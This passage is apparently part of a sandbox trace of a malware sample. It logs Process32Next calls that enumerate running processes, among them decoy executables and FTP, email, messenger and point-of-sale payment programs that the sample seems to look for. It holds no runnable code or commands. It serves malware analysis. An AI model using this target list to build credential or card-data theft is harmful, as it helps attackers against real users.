szExeFile="ShellExperienceHost.exe")) returned 1 [0219.639] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0219.640] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0219.642] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0219.643] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0219.647] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0219.651] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.677] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0219.678] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0219.680] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0219.682] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0219.684] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.685] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x624, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="onlawyerseek.exe")) returned 1 [0219.687] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact believe worker.exe")) returned 1 [0219.688] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="partner.exe")) returned 1 [0219.691] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whole.exe")) returned 1 [0219.693] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="nation-choose.exe")) returned 1 [0219.694] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x514, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="insteadrecent.exe")) returned 1 [0219.696] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="side-end-death.exe")) returned 1 [0219.697] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="young every moment.exe")) returned 1 [0219.699] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="somethingvictim.exe")) returned 1 [0219.701] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="director_glass_possible.exe")) returned 1 [0219.702] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accept.exe")) returned 1 [0219.704] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ability-where-operation.exe")) returned 1 [0219.707] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="condition.exe")) returned 1 [0219.708] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="executive_anything.exe")) returned 1 [0219.710] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="movement indeed best.exe")) returned 1 [0219.712] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="memberheavy.exe")) returned 1 [0219.716] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gardenpolitical.exe")) returned 1 [0219.718] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="program-him-cell.exe")) returned 1 [0219.719] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="long_sense.exe")) returned 1 [0219.721] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="agreeinterestingreceive.exe")) returned 1 [0219.723] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x105c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0219.724] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1068, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0219.726] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1074, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0219.728] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0219.730] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0219.732] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0219.734] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0219.736] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0219.738] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0219.740] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0219.742] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0219.744] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0219.746] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0219.749] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0219.751] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0219.796] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0219.798] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x112c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0219.800] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1134, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0219.802] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0219.804] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0219.806] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x114c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0219.808] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1154, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0219.810] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x115c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0219.821] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1164, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0219.823] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x116c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0219.825] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0219.826] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x117c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0219.828] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0219.830] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x118c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0219.832] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0219.834] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x119c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0219.836] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0219.838] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0219.878] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0219.880] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0219.882] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0219.884] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0219.886] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0219.888] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0219.889] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0219.893] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0219.895] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0219.896] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0219.898] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="society-position-myself.exe")) returned 1 [0219.900] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="heavy.exe")) returned 1 [0219.902] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mayvarious.exe")) returned 1 [0219.903] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0219.905] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xa1c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0219.907] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0219.909] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0219.910] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x37c, 